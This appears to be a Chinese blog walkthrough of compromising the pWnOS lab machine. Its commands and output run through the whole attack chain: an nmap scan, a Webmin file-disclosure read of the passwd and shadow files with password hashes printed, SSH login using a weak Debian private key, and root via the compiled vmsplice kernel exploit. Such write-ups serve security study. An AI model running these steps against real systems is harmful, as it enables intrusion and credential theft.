Posted in靶机渗透

pWnOS渗透

No Comments
pWnOS渗透

kali ip:192.168.2.133

目标 ip:192.168.2.139

1.信息收集

  • nmap -sV -A 192.168.2.139
    • Host is up (0.0062s latency).
    • Not shown: 995 closed tcp ports (reset)
    • PORT STATE SERVICE VERSION
    • 22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
    • 80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
    • 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: MSHOME)
    • 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: MSHOME)
    • 10000/tcp open http MiniServ 0.01 (Webmin httpd)

2.漏洞利用

  • webmin任意文件读取
    • 使用msf的admin/webmin/file_disclosure模块
    • 发现四名用户
      • vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
        obama:x:1001:1001::/home/obama:/bin/bash
        osama:x:1002:1002::/home/osama:/bin/bash
        yomama:x:1003:1003::/home/yomama:/bin/bash
      • vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
        obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
        osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
      • 爆破密码太慢,看是否有ssh公钥。查看第一个用户,发现公钥
        • ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw== vmware@ubuntuvm
    • 利用工具查找私钥
      • # 下载工具并解压
        wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2

        # 查找公钥对应的公钥文件
        cd rsa/2048
        grep -lr "AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw=="

        # 找到公钥文件
        d8629ce6dc8f2492e1454c13f46adb26-4566.pub

        # 找私钥文件
        去掉公钥文件的.pub对应的文件就是私钥文件
    • 利用私钥文件无密码登录,获取shell
      • ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.2.139 -oHostKeyAlgorithms=ssh-rsa -oPubkeyAcceptedKeyTypes=ssh-rsa
        vmware@ubuntuvm:~$
  • 利用内核进行提权
    • 查看内核版本:uname -a
      • Linux ubuntuvm 2.6.22-14-server
    • 查看内核漏洞:searchsploit “Linux Kernel 2.6.2” |grep “Local Privilege”
      • Linux Kernel 2.6.17 < 2.6.24.1 - 'vmsplice' Local Privilege Escalation (2)     linux/local/5092.c
        # 下载
        searchsploit -m linux/local/5092.c .
    • 本地提权
      • 查看作者的注释没发现特别说明,直接用python共享至目标,编译并运行
        • gcc 5092.c -o poc
          ./poc

          # 直接root
          -----------------------------------
          Linux vmsplice Local Root Exploit
          By qaaz
          -----------------------------------
          [+] mmap: 0x0 .. 0x1000
          [+] page: 0x0
          [+] page: 0x20
          [+] mmap: 0x4000 .. 0x5000
          [+] page: 0x4000
          [+] page: 0x4020
          [+] mmap: 0x1000 .. 0x2000
          [+] page: 0x1000
          [+] mmap: 0xb7daf000 .. 0xb7de1000
          [+] root
          root@ubuntuvm:~#
Tags:

Comments

No comments yet. Why don’t you start the discussion?

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

证明你是人: 1   +   6   =